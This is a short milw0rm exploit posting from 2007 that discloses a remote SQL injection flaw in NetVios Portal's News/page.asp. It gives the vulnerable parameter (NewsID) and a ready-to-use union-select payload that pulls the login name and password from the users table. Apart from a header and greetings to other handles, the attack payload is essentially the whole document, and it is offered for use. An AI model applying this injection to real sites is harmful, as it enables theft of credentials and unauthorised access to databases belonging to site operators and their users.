******************************************************************************* # Title : NetVios Portal (page.asp) Remote SQL Injection Vulnerability # Author : parad0x # Contact : :( # D.Page : http://www.scriptaty.net/netvios-portal.html # $$ : Free #S.Page : http://www.netvios.com ******************************************************************************* http://[target]/[path]/News/page.asp?NewsID=[SQL] Example: //News/page.asp?NewsID=-1 union select 0,1,2,loginname,password,5,6,7 from users where userId=1 """"""""""""""""""""" greetz : VoLqaN, x-MastER """"""""""""""""""""" # milw0rm.com [2007-03-19]